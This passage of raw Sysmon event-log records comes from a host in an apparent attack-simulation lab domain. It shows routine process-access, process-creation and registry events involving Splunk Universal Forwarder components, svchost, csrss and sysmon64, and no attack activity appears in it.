13:45:16.618{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4AEC-6000-A305-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.618{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEC-6000-A305-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.619{08A6967A-4AEC-6000-A305-000000009A01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000014527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000014526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000014525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000014524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6ea7b-0x7db7f770) 13241300x800000000000000014523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000014522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:45:16.509{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000014521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:16.103{08A6967A-4AEB-6000-A205-000000009A01}62606048C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.681{08A6967A-4AED-6000-A405-000000009A01}55966088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AED-6000-A405-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4AED-6000-A405-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AED-6000-A405-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:17.525{08A6967A-4AED-6000-A405-000000009A01}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.884{08A6967A-4AEE-6000-A605-000000009A01}63006276C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEE-6000-A605-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4AEE-6000-A605-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.712{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AEE-6000-A605-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.713{08A6967A-4AEE-6000-A605-000000009A01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.196{08A6967A-4AEE-6000-A505-000000009A01}54685592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AEE-6000-A505-000000009A01}5468C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:45:18.040{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 